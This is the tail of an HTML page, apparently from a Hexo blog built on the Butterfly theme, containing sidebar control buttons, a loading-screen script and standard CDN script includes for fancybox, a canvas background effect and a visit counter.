Mode"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="Toggle between single-column and double-column"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="Setting"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="Table Of Contents"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="Back To Top"><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.min.js"></script><script>var preloader = {
  endLoading: () => {
    document.body.style.overflow = 'auto';
    document.getElementById('loading-box').classList.add("loaded")
  },
  initLoading: () => {
    document.body.style.overflow = '';
    document.getElementById('loading-box').classList.remove("loaded")

  }
}
window.addEventListener('load',preloader.endLoading())</script><div class="js-pjax"></div><script id="canvas_nest" defer="defer" color="0,0,255" opacity="0.7" zIndex="-1" count="99" mobile="false" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/dist/canvas-nest.min.js"></script><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>